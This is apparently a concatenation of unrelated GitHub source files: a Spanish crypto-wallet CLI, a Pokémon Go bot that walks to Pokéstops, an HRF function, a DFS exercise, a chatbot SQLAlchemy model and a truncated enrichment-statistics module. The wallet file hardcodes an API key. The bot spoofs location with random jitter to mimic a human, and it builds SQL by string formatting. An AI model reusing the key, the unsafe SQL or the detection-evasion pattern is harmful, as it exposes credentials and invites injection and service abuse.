COINMARKET_API_KEY = "edfb80cf-4e28-402c-868f-6071813d94df"
headers = {
'Accepts' : 'application/json',
'X-CMC_PRO_API_KEY' : COINMARKET_API_KEY
}
data = requests.get ("https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest", headers = headers).json()
for cripto in data ["data"] :
monedas_list.append (cripto ["symbol"])
precios_list.append(cripto ["quote"]["USD"]["price"])
def moneda_recibida (cripto) :
return cripto in recibir_moneda
def moneda_enviada (cripto) :
return cripto in enviar_moneda
def moneda_consulta (cripto) :
return cripto in consulta_cripto
recibir_moneda = tuple (monedas_list)
enviar_moneda = tuple (monedas_list)
consulta_cripto = tuple (monedas_list)
precios = tuple (precios_list)
class Transacciones : #Atributos transacciones
transaccion_info = ()
saldo_total_usd = 0
recibir_moneda = ""
enviar_moneda = ""
recibir_cantidad = 0
enviar_cantidad = 0
rt = Transacciones
def recibir_monto () :
rt.recibir_moneda = input ("Ingrese la moneda a recibir: ") #Indica la moneda a recibir por el usuario
while not moneda_recibida (rt.recibir_moneda): #Verifica cripto
print("Moneda invalida.")
rt.recibir_moneda = input ("Ingrese la moneda a recibir: ")
rt.recibir_cantidad = float (input ("Ingrese la cantidad a recibir: ")) #Indica la cantidad a recibir por el usuario
codigo_sender = int (input ("Código del usuario que envía las criptomonedas: ")) #Indica el código de usuario de quien envía las criptos
if codigo_sender == codigo_usuario : #Verifica que el código de quien envía sea distinto al que recibe
i = 0
while i == 0 :
print ("Código de usuario personal, por favor verifique el código de usuario.")
codigo_sender = int (input ("Código del usuario que envía las criptomonedas: "))
if codigo_sender != codigo_usuario :
i = i + 1
indice_moneda = monedas_list.index (rt.recibir_moneda) #Devuelve el índice en el cual se encuentra la cripto
precio = precios_list [indice_moneda] #Busca el precio de la cripto en la lista de precios
cantidad_fiat_recibida = rt.recibir_cantidad * precio #Indica monto en USD de cripto
rt.transaccion_info = "Ud. recibió%6.2f"%float(rt.recibir_cantidad) + " " + rt.recibir_moneda + " del usuario " + str(codigo_sender) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Confirma la transacción al usuario.
print ("Ud. recibió%6.2f"%float (rt.recibir_cantidad) + " " + rt.recibir_moneda + " del usuario " + str(codigo_sender) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Confirma la transacción al usuario.
print ("%6.2f"%float (cantidad_fiat_recibida))
rt.saldo_total_usd = rt.saldo_total_usd + cantidad_fiat_recibida
print ("%6.2f"%float (rt.saldo_total_usd))
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def transferir_monto () :
rt.enviar_moneda = input ("Ingrese la moneda a enviar: ") #Indica la moneda a enviar por el usuario
while not moneda_enviada (rt.enviar_moneda): #Verifica cripto
print("Moneda invalida.")
rt.enviar_moneda = input ("Ingrese la moneda a enviar: ")
rt.enviar_cantidad = float (input ("Ingrese la cantidad a enviar: ")) #Indica la cantidad a recibir por el usuario
indice_moneda = monedas_list.index (rt.enviar_moneda) #Devuelve el índice en el cual se encuentra la cripto
precio = precios_list [indice_moneda] #Busca el precio de la cripto en la lista de precios
cantidad_fiat_enviada = rt.enviar_cantidad * precio #Indica monto en USD de cripto
if cantidad_fiat_enviada > rt.saldo_total_usd : #Verifica que el usuario tenga saldo sufiente en la cuenta para transferir
e = 0
while e == 0 :
print ("Fondos insuficientes, por favor verifique la transacción e indique un nuevo monto.")
rt.enviar_cantidad = float (input ("Ingrese la cantidad a enviar: "))
cantidad_fiat_enviada = rt.enviar_cantidad * precio
if cantidad_fiat_enviada <= rt.saldo_total_usd :
e = e + 1
codigo_destinatario = int (input ("Código del usuario destinatario de las criptomonedas: ")) #Indica el código de usuario destinatario de las criptos
if codigo_destinatario == codigo_usuario : #Verifica que el código del destinatario sea distinto al del usuario
i = 0
while i == 0 :
print ("Código de usuario personal, por favor verifique el código de usuario.")
codigo_destinatario = int (input ("Código del usuario destinatario de las criptomonedas: "))
if codigo_destinatario != codigo_usuario :
i = i + 1
rt.transaccion_info = "Ud. envió%6.2f"%float(rt.enviar_cantidad) + " " + rt.enviar_moneda + " al usuario " + str(codigo_destinatario) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Registra la transacción al usuario.
print ("Ud. envió%6.2f"%float(rt.enviar_cantidad) + " " + rt.enviar_moneda + " al usuario " + str(codigo_destinatario) + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Confirma la transacción al usuario.
print ("%6.2f"%float (cantidad_fiat_enviada))
rt.saldo_total_usd = rt.saldo_total_usd - cantidad_fiat_enviada
print ("%6.2f"%float (rt.saldo_total_usd))
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def balance_cripto () :
consulta_cripto = str (input ("Indique la criptomoneda a consultar: ")) #Solicita la cripto para consultar balance
while not moneda_consulta (consulta_cripto): #Verifica cripto
print("Moneda Invalida.")
consulta_cripto = input ("Ingrese la moneda a consultar: ")
for rt.transaccion_info in registro :
if rt.recibir_moneda == consulta_cripto and rt.enviar_moneda == consulta_cripto :
balance_moneda = (float (rt.recibir_cantidad) - float (rt.enviar_cantidad))
print ("Su balance de " + consulta_cripto + " es de " + str (balance_moneda) + " al día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Muestra el balance de la criptomoneda
rt.transaccion_info = "Ud. consultó su balance de la moneda " + consulta_cripto + " el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Guarda registro de la consulta en el registro general
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def balance_general () :
print ("Su balance total es de " + str ("%6.2f"%float (rt.saldo_total_usd)) + " USD al día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M")) #Muestra el balance de la criptomoneda
rt.transaccion_info = "Ud. consultó su balance general el día " + diaConsulta.strftime("%A %d/%m/%y a las %H:%M") + "." #Guarda registro de la consulta en el registro general
registro.append (rt.transaccion_info) #Guarda registro de la consulta en el registro general
archivo_registro ()
def registro_transacciones () :
print ("Este es el registro de todos sus movimientos:")
archivo = open ("registro_transacciones.txt")
print (archivo.read())
archivo.close()
def salir () :
print ("Gracias por usar la billetera, ¡hasta pronto!") #Imprime mensaje de despedida al usuario y cierra la aplicación
def archivo_registro () : #Guarda el registro en un archivo de texto
archivo = open ("registro_transacciones.txt", "a")
archivo.write (rt.transaccion_info + "\n")
archivo.close()
def iniciar_billetera () : #Muestra el menú de opciones al usuario y espera por la selección del usuario
opcion = 0
while opcion != 6 :
#Preguntar opción
print ("Por favor seleccione una de las siguientes opciones: \n 1- Recibir criptomonedas. \n 2- Transferir criptomonedas. \n 3- Mostrar balance de criptomoneda. \n 4- Mostrar balance general. \n 5- Mostrar histórico de transacciones. \n 6- Salir del programa.")
opcion = int (input ("Introduzca su selección: "))
if opcion == 1 :
recibir_monto ()
elif opcion == 2 :
transferir_monto ()
elif opcion == 3 :
balance_cripto ()
elif opcion == 4 :
balance_general ()
elif opcion == 5 :
registro_transacciones ()
elif opcion == 6 :
salir ()
else :
print ("Por favor seleccione una opción válida.") #Verifica que el usuario seleccione una opción válida
iniciar_billetera ()
| [
"noreply@github.com"
] | Roger-MG.noreply@github.com |
4a70189f56b7c999e46df08262eb3ac37e231c87 | 77871bb4c5f4714a19c33ad804a20c94bcdacc7e | /Interfaces/AI/Stepper/Pokestopper.py | abd44d28f5e7de1647e7ca9a35e479c9fd8da45b | [] | no_license | MaxOnNet/PokeStats | 58165f449acf3fc5b14e4f3a63a783f947df3eb8 | 3eb5aa2d13833b1d2299023f4d6f88348bae3bd6 | refs/heads/master | 2021-01-20T20:28:56.999545 | 2016-08-24T08:06:41 | 2016-08-24T08:06:41 | 63,936,162 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,961 | py | # -*- coding: utf-8 -*-
import logging
import random
from math import ceil
from sqlalchemy import text as sql_text
from Interfaces.MySQL.Schema import Pokestop, parse_map_cell
from Interfaces.AI.Human import sleep, random_lat_long_delta, action_delay
from Interfaces.AI.Stepper.Normal import Normal
from Interfaces.AI.Worker.Utils import format_time, distance
from Interfaces.pgoapi.utilities import f2i, h2f, get_cell_ids
log = logging.getLogger(__name__)
class Pokestopper(Normal):
def inicialise(self):
log.info('Точечное сканирование P\S, переопределяем переменные БД')
self.scanner.mode.step = 0.0015
self.scanner.mode.walk = 6
self.scanner.mode.is_catch = False
self.scanner.mode.is_farm = True
self.scanner.mode.is_lookup = False
self.scanner.mode.is_defender = False
def take_step(self):
position = [self.origin_lat, self.origin_lon, 0]
coords = self.generate_coords(self.origin_lat, self.origin_lon, self.step, self.distance)
self.metrica.take_position(position, self.geolocation.get_google_polilyne(coords))
self.api.set_position(*position)
step = 1
for coord in coords:
self.metrica.take_status(scanner_msg='Point P\S ({} / {})'.format(step, len(coords)))
log.info('Точечное сканирование P\S ({} / {})'.format(step, len(coords)))
position = (coord['lat'], coord['lng'], 0)
if self.walk > 0:
self._walk_to(self.walk, *position)
else:
self.api.set_position(*position)
self.ai.heartbeat()
self._work_at_position(position[0], position[1], position[2], seen_pokemon=False, seen_pokestop=True, seen_gym=False, data=coord['id'])
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
step += 1
def _walk_to(self, speed, lat, lng, alt):
dist = distance(self.api._position_lat, self.api._position_lng, lat, lng)
steps = (dist + 0.0) / (speed + 0.0) # may be rational number
intSteps = int(steps)
residuum = steps - intSteps
log.info('Бежим из ' + str((self.api._position_lat, self.api._position_lng)) + " в " + str(str((lat, lng))) +
" на " + str(round(dist, 2)) + " по прямой. " + str(format_time(ceil(steps))))
if steps != 0:
dLat = (lat - self.api._position_lat) / steps
dLng = (lng - self.api._position_lng) / steps
for i in range(intSteps):
cLat = self.api._position_lat + dLat + random_lat_long_delta()
cLng = self.api._position_lng + dLng + random_lat_long_delta()
self.api.set_position(cLat, cLng, alt)
self.ai.heartbeat()
action_delay(self.ai.delay_action_min, self.ai.delay_action_max)
self.api.set_position(lat, lng, alt)
self.ai.heartbeat()
def _work_at_position(self, lat, lng, alt, seen_pokemon=False, seen_pokestop=False, seen_gym=False, data=None):
if data is not None:
pokestop = self.session.query(Pokestop).get(data)
cell = {
'forts': [
{
'id': pokestop.id,
'type': 1,
'latitude': pokestop.latitude,
'longitude': pokestop.longitude
}
]
}
self.metrica.take_search({'pokestops': 1})
self.api.set_position(lat, lng, alt)
self.ai.work_on_cell(cell, (lat, lng, alt), seen_pokemon=False, seen_pokestop=True, seen_gym=False)
position = (lat, lng, alt)
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
map_cells = list()
sleep(self.ai.delay_scan)
response_dict = self.api.get_map_objects(latitude=f2i(lat), longitude=f2i(lng), since_timestamp_ms=timestamp, cell_id=cellid)
self.search.search(lat, lng)
if response_dict and 'status_code' in response_dict:
if response_dict['status_code'] is 1:
if 'responses' in response_dict:
if 'GET_MAP_OBJECTS' in response_dict['responses']:
if 'status' in response_dict['responses']['GET_MAP_OBJECTS']:
if response_dict['responses']['GET_MAP_OBJECTS']['status'] is 1:
map_cells = response_dict['responses']['GET_MAP_OBJECTS']['map_cells']
# Update current scanner location
self.metrica.take_position(position)
map_cells.sort(key=lambda x: distance(lat, lng, x['forts'][0]['latitude'], x['forts'][0]['longitude']) if 'forts' in x and x['forts'] != [] else 1e6)
log.debug("Получена информация о карте в размере {0} ячеек".format(len(map_cells)))
for cell in map_cells:
self.metrica.take_search(parse_map_cell(cell, self.session))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['responses']['GET_MAP_OBJECTS']['status']))
else:
log.warning("Получен неверный статус: {0}".format(response_dict['status_code']))
self.api.set_position(lat, lng, alt)
for cell in map_cells:
self.ai.work_on_cell(cell, position, seen_pokemon=seen_pokemon, seen_pokestop=seen_pokestop, seen_gym=seen_gym)
def generate_coords(self, latitude, longitude, step_size, distance):
sql = """
SELECT
id as "pokestop_id",
latitude as "pokestop_latitude",
longitude as "pokestop_longitude",
(
6371 * acos (
cos ( radians({0}) )
* cos( radians( latitude ) )
* cos( radians( longitude ) - radians({1}) )
+ sin ( radians({2}) )
* sin( radians( latitude ) )
) * 1000
) AS "pokestop_distance"
FROM pokestop
HAVING pokestop_distance < {3}
ORDER BY pokestop_distance
""".format(latitude, longitude, latitude, distance)
coords = []
for pokestop in self.session.execute(sql_text(sql)):
lat = pokestop[1] + random_lat_long_delta()
lng = pokestop[2] + random_lat_long_delta()
coords.append({'lat': lat, 'lng': lng, 'id': pokestop[0]})
return coords | [
"viktor@tatarnikov.org"
] | viktor@tatarnikov.org |
72d83f61ea7278de06a9f45c110a3ffba2430063 | 163808746e51d378f69a966645b8bb8a855b4625 | /MyMain1012/MyMain1012/mislHrf.py | 860d28ba23c0e7b4b51f525d9b16734181920a56 | [] | no_license | 0024thiroshi/comm5.0_fall_semester | 02b26b506b759dd7b18b963295a8908cb4a78245 | db350599b7085e56fbf2c316e74cd7a5b48f02b8 | refs/heads/main | 2023-02-12T13:07:34.080809 | 2021-01-13T06:03:04 | 2021-01-13T06:03:04 | 329,202,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | import scipy
import numpy as np
from math import exp
import pandas as pd
import scipy.stats as sps
import matplotlib.pyplot as plt
import math
def hrf(nt,
peak_delay=6,
under_delay=10,
p_u_ratio = 6,):#nt:時間間隔
t = np.arange(0,30+nt,nt)
peak_disp=1
under_disp=1
normalize=True
hrf = np.zeros(t.shape, dtype=np.float)
pos_t = t[t > 0]
peak = sps.gamma.pdf(pos_t,
peak_delay/peak_disp,
loc=0,
scale=peak_disp)
UD = under_delay + peak_delay
undershoot = sps.gamma.pdf(pos_t,
UD / under_disp,
loc=0,
scale=under_disp)
hrf = peak - undershoot / p_u_ratio
if not normalize:
return hrf
return hrf / np.max(hrf)
| [
"“0024thiroshi@gmail.com”"
] | “0024thiroshi@gmail.com” |
70cd0f7ef97a463fae3db5e76f2191296a70c392 | 06fa7c7e45c8406b88ac663ff90113fab3e9a2cc | /패스트캠퍼스/유형별문제풀이/그래프/유기농배추.py | d86acde13447256b5e7c8ad0967f25facfaf211e | [] | no_license | choiseongjun/pyAlgo | 00aca2dae07c32af2297067acb63c3426f1b8006 | 140d956201480cdc36208ddbc73694c418d80d30 | refs/heads/master | 2023-07-10T18:30:16.021666 | 2021-08-21T10:16:44 | 2021-08-21T10:16:44 | 291,391,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | import sys
sys.setrecursionlimit(100000)
def dfs(x,y):
visited[x][y]= True
directions = [(-1,0),(1,0),(0,-1),(0,1)]
for dx,dy in directions:
nx,ny = x+dx,y+dy
if nx<0 or nx>=n or ny<0 or ny>=m:
continue
if array[nx][ny] and not visited[nx][ny]:
dfs(nx,ny)
if __name__ == '__main__':
for _ in range(int(input())):
m,n,k = map(int,input().split())
array = [[0]*m for _ in range(n)]
visited = [[False]*m for _ in range(n)]
for _ in range(k):
y,x = map(int,input().split())
array[x][y]=1
result=0
for i in range(n):
for j in range(m):
if array[i][j] and not visited[i][j]:
dfs(i,j)
result+=1
print(result) | [
"csj2702@naver.com"
] | csj2702@naver.com |
b110edb9f48ccae3c6ff80bd3c04ab0d2029c060 | 8e260d6f6858bde5479d2721805f056b01acb798 | /loop1.py | 36b5069684bfcf0c744ed1326411e1145882c472 | [] | no_license | cyslug/tests | c77e7745b3fe63272fa1e319f27f7053a91a4957 | 692de6f53f6396ec3a69bc70aa93c72cb235f329 | refs/heads/master | 2021-01-13T14:54:28.906507 | 2017-07-17T14:01:47 | 2017-07-17T14:01:47 | 76,464,992 | 0 | 0 | null | 2017-07-17T14:01:48 | 2016-12-14T14:07:14 | null | UTF-8 | Python | false | false | 130 | py | emails = ["me@hotmail.com", "you@hotmail.com", "they@gmail.com"]
for item in emails:
if "gmail" in item:
print(item)
| [
"noreply@github.com"
] | cyslug.noreply@github.com |
c04d091c8fe19070af6afcc94199fcf91fd50791 | 9d6613627914434723b6e30a79e229c448379768 | /test.py | 942c75d95ce7a6f566e5b2fbb8a505c823aec8ff | [
"MIT"
] | permissive | arka816/php-node-transpiler | 1ea910656995ec15e1df28e6e9f727557d0c86a8 | 60228d45d546523b2bcaec6a9b667182ed691817 | refs/heads/master | 2022-11-14T15:51:16.474793 | 2020-06-23T16:49:24 | 2020-06-23T16:49:24 | 273,939,533 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from phplexer import tokenizer
from phpparser import generateAST
f = open("server.php", "r", encoding="utf-8")
s = f.read()
tokenlist = tokenizer(s[s.find("php")+3:])
root=generateAST(tokenlist) | [
"noreply@github.com"
] | arka816.noreply@github.com |
25be4fae46145ceb5e47fa22fb8cdd1e9069acff | 19a4383c061f76c5217b8070d59012100aef1518 | /one/Scripts/easy_install-script.py | 96510d4ab43bab65196d8e1bd225747fe4359631 | [
"MIT"
] | permissive | WaiYan-1302/Git-Python | 62b797bfabf1d3d10a06ba91289db19f27e5a7e3 | 9f777a83229a71aa963a33d55b52b0746d59f663 | refs/heads/master | 2020-11-24T07:13:15.765497 | 2020-02-29T13:48:29 | 2020-02-29T13:48:29 | 228,021,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | #!"C:\Users\scrip\Desktop\New folder\Python Class Sat Sun 2\Python-Sat-Sun-Batch-5-master\one\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"script1302@gmail.com"
] | script1302@gmail.com |
b2eb613a9162290732d40c2631fdb47d3cb98dbf | af3ec207381de315f4cb6dddba727d16d42d6c57 | /dialogue-engine/src/programy/storage/stores/sql/dao/link.py | f6447200627f0fc643988dcc8badf78e7d13dab7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mcf-yuichi/cotoba-agent-oss | 02a5554fe81ce21517f33229101013b6487f5404 | ce60833915f484c4cbdc54b4b8222d64be4b6c0d | refs/heads/master | 2023-01-12T20:07:34.364188 | 2020-11-11T00:55:16 | 2020-11-11T00:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,960 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from sqlalchemy import Column, Integer, String, Boolean, DateTime
from programy.storage.stores.sql.base import Base
from programy.storage.stores.utils import DAOUtils
class Link(Base):
__tablename__ = 'links'
id = Column(Integer, primary_key=True)
primary_user = Column(String(16))
generated_key = Column(String(256))
provided_key = Column(String(256))
expired = Column(Boolean)
expires = Column(DateTime)
retry_count = Column(Integer)
def __repr__(self):
return "<Linked(id='%s', primary_user='%s', provided_key='%s', generated_key='%s', expired='%s', expires='%s', retry_count='%d')>" % \
(DAOUtils.valid_id(self.id), self.primary_user, self.provided_key, self.generated_key, self.expired, self.expires, self.retry_count)
| [
"cliff@cotobadesign.com"
] | cliff@cotobadesign.com |
e7e44f6c501f1455b389ef57e85fc9f635efc6a2 | b0ddd37a614556785b2ecd3d408357fd010ed72f | /test/test_py2vega.py | 61017752de6e06bfb281d05b43ba4bed2c5c5854 | [
"BSD-3-Clause"
] | permissive | codeaudit/py2vega | 837c9b347f4968956656fcfbc15b2d69110e267f | a3a94bf7e29414a649b796e3202a5621befadbb3 | refs/heads/master | 2020-07-07T13:06:04.690110 | 2019-08-20T08:49:12 | 2019-08-20T08:49:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,294 | py | import pytest
from py2vega import py2vega
from py2vega.functions.math import isNaN
whitelist = ['value', 'x', 'y', 'height', 'width', 'row', 'column']
def test_nameconstant():
code = 'False'
assert py2vega(code, whitelist) == 'false'
code = 'True'
assert py2vega(code, whitelist) == 'true'
code = 'None'
assert py2vega(code, whitelist) == 'null'
def test_num():
code = '36'
assert py2vega(code, whitelist) == '36'
def test_str():
code = '\'white\''
assert py2vega(code, whitelist) == '\'white\''
def test_tuple():
code = '(True, 3, \'hello\')'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
code = '((True, 3, \'hello\'), 3)'
assert py2vega(code, whitelist) == '[[true, 3, \'hello\'], 3]'
def test_list():
code = '[True, 3, \'hello\']'
assert py2vega(code, whitelist) == '[true, 3, \'hello\']'
def test_dict():
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
code = '{\'hello\': 3, \'there\': 4}'
assert py2vega(code, whitelist) == '{\'hello\': 3, \'there\': 4}'
def test_unary():
code = 'not value'
assert py2vega(code, whitelist) == '!(value)'
code = '-value'
assert py2vega(code, whitelist) == '-value'
code = '+value'
assert py2vega(code, whitelist) == '+value'
def test_binary():
code = 'value or 3'
assert py2vega(code, whitelist) == 'value || 3'
code = 'value and 3'
assert py2vega(code, whitelist) == 'value && 3'
code = 'value + 3'
assert py2vega(code, whitelist) == 'value + 3'
code = 'value**3'
assert py2vega(code, whitelist) == 'pow(value, 3)'
def test_ternary():
code = '3 if value else 4'
assert py2vega(code, whitelist) == 'value ? 3 : 4'
def test_compare():
code = '3 < value <= 4'
assert py2vega(code, whitelist) == '3 < value <= 4'
code = 'value in (\'ford\', \'chevrolet\')'
assert py2vega(code, whitelist) == 'indexof([\'ford\', \'chevrolet\'], value) != -1'
code = '\'chevrolet\' in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') != -1'
code = '\'chevrolet\' not in value'
assert py2vega(code, whitelist) == 'indexof(value, \'chevrolet\') == -1'
def foo(value):
return 'red' if value < 150 else 'green'
def test_function():
assert py2vega(foo, whitelist) == 'value < 150 ? \'red\' : \'green\''
def test_whitelist():
with pytest.raises(NameError):
py2vega('my_variable')
assert py2vega('my_variable', ['my_variable']) == 'my_variable'
# Vega constants are accessible by default
assert py2vega('PI') == 'PI'
def bar():
return isNaN(3)
def test_math():
assert py2vega(bar) == 'isNaN(3)'
def invalid_func1():
print(3)
def test_invalid1():
with pytest.raises(RuntimeError):
py2vega(invalid_func1)
def test_invalid2():
with pytest.raises(RuntimeError):
py2vega(lambda value: value)
def conditional_func(value):
if value < 3:
return 'red'
elif value < 5:
return 'green'
else:
return 'yellow'
def test_if_stmt():
assert py2vega(conditional_func, whitelist) == "if(value < 3, 'red', if(value < 5, 'green', 'yellow'))"
def assign_func1(value):
val = ('USA', 'Japan')
return 'red' if value in val else 'green'
def assign_func2(value):
a = 'green'
b = 'red'
return a if value < 3 else b
def assign_func3(value):
a = 'green'
a = 'red'
return a
def assign_func4(value):
a = 'green'
b = a
return b
def assign_func5(value):
a = b = 'Hello'
return (a, b)
def assign_func6(value):
a = 'Hello'
b = a
a = 'World'
return b
def test_assign1():
assert py2vega(assign_func1, whitelist) == "indexof(['USA', 'Japan'], value) != -1 ? 'red' : 'green'"
def test_assign2():
assert py2vega(assign_func2, whitelist) == "value < 3 ? 'green' : 'red'"
def test_assign3():
assert py2vega(assign_func3, whitelist) == "'red'"
def test_assign4():
assert py2vega(assign_func4, whitelist) == "'green'"
def test_assign5():
assert py2vega(assign_func5, whitelist) == "['Hello', 'Hello']"
def test_assign6():
assert py2vega(assign_func6, whitelist) == "'Hello'"
| [
"martin.renou@gmail.com"
] | martin.renou@gmail.com |
4152c23801374c7f6045a744aabcf125ba1213af | 4d2942cb8b7a6c15c1d09c36e4a881cd8d54b981 | /이분탐색/3020_개똥벌레_누적합.py | 54981889f353f99283bfff385ea981ccacc51ea8 | [] | no_license | Novicett/codingtest_with_python | 4ebbceedce42ea5c27bebbacaec0046a7fc7cce8 | 9cfb1a1be81acd69bf73d2f3698145c74e305dc0 | refs/heads/master | 2023-05-30T02:03:08.620929 | 2021-06-20T03:22:24 | 2021-06-20T03:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | import sys
input = sys.stdin.readline
N, H = map(int, input().split())
#구간 i에서
bottom = [0]*(H+1) #석순 -> 길이 i 이상면 부셔야함
top = [0]*(H+1) #종유석 -> 길이 N-i 이상이면 부셔야함
for _ in range(N//2):
b = int(input().strip())
bottom[b] += 1
t = int(input().strip())
top[t] += 1
min_val = [0]*N
answer = N
stone = [0]*(H+1)
for i in range(1, H+1):
stone[i] = sum(bottom[i:])+sum(top[H-i+1:])
print(stone) | [
"viliketh1s98@naver.com"
] | viliketh1s98@naver.com |
c85ea979fa55726808cbb173ae8c5e57cd2b6165 | 5536ef87d7d10ab01befb85a34d6fb5bfddde49f | /weed/wsgi.py | 8d293b07852294fa53887d3952396dd811f0b5a3 | [] | no_license | ViriAldi/DB_project_weed_app | 987a5db0fc175c67312d27949266505ab5ede05e | 620e503b0d33844ef9832902cf5c104abf967266 | refs/heads/master | 2023-05-08T13:06:08.302939 | 2021-05-30T21:48:30 | 2021-05-30T21:48:30 | 372,316,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
WSGI config for weed project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'weed.settings')
application = get_wsgi_application()
| [
"v.fedynyak@ucu.edu.ua"
] | v.fedynyak@ucu.edu.ua |
d771baddfaa09a4c3db22756b3f490f38382cbf3 | afada51a34ebc932fc9ca824ecf56aae04e3d74b | /lib/enrichment_modules.py | b74c4fce6db72594a14b0b79acb4fe6ac996284c | [] | no_license | SkBlaz/CBSSD | 0ec8c7e3fc2765d4897b650f584e97afabf7c4f6 | 3043a76c7065fa0f13770f38d3b7b3f661a9f117 | refs/heads/master | 2021-01-01T19:53:21.190536 | 2019-02-01T06:31:23 | 2019-02-01T06:31:23 | 98,710,089 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,931 | py | ##### this pyton code enables enrichment calculation from graph results from previous step
## this is to calculate enrichment scores
from scipy.stats import fisher_exact
import multiprocessing as mp
import random
from statsmodels.sandbox.stats.multicomp import multipletests
from collections import defaultdict, Counter
from .parsers import parse_gaf_file,read_termlist,read_topology_mappings,read_uniprot_GO
import pandas as pd
def calculate_pval(term):
# _partition_name,_partition_entries,term,_map_term_database,_number_of_all_annotated
## this calculates p value
#print(component, term_dataset, term, count_all)
query_term = term[0]
query_term_count_population = term[1]
inside_local = 0
outside_local = 0
for x in _partition_entries:
terms = _map_term_database[x]
if query_term in terms:
inside_local+=1
else:
outside_local+=1
query_counts = [inside_local, query_term_count_population]
pop_counts = [outside_local, _number_of_all_annotated-query_term_count_population]
p_value = fisher_exact([query_counts,pop_counts])[1]
return p_value
def multiple_test_correction(input_dataset):
from statsmodels.sandbox.stats.multicomp import multipletests
pvals = defaultdict(list)
with open(input_dataset) as ods:
for line in ods:
try:
component, term, pval = line.split()
pvals[component].append((term,pval))
except:
pass
print ("Component_by_size PFAM_term pvalue")
for key, values in pvals.items():
tmpP = [float(val[1]) for val in values]
termN = [val[0] for val in values]
significant, pvals, sidak, bonf = multipletests(tmpP,method="hs",is_sorted=False,returnsorted=False)
## Holm Sidak
output = zip(termN,significant,pvals,tmpP)
for term,significant,pval,tmp in output:
if (significant == True):
print (key,term,significant,tmp,pval)
def parallel_enrichment(term):
pval = calculate_pval(_term_database[term])
return {'observation' : _partition_name,'term' : _term_database[term][0],'pval' : pval}
def compute_enrichment(term_dataset, term_database, topology_map, all_counts, whole_term_list=False):
if whole_term_list:
tvals = set.union(*[x for x in topology_map.values()])
topology_map = {}
topology_map['1_community'] = tvals
global _partition_name
